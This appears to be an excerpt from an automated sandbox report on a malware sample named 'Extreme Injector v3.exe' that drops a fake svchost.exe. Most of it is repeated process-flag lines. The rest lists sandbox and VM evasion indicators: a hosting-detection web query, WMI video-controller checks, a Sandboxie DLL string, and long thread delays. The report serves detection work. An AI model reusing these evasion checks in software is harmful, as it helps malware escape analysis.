                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Check if machine is in data center or colocation facility
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: Extreme Injector v3.exe, svchost.exe.0.drBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeMemory allocated: AB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeMemory allocated: 1A590000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: FA0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1AEA0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 2DE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1ADE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1C90000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1C90000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeWindow / User API: threadDelayed 1472Jump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeWindow / User API: threadDelayed 8339Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6435Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3356Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7596Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2018Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7976Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1516Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7381
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2150
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exe TID: 3760Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8168Thread sleep count: 7976 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6872Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8164Thread sleep count: 1516 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3592Thread sleep count: 7381 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3592Thread sleep count: 2150 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5076Thread sleep time: -5534023222112862s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 7664Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 5928Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 7892Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
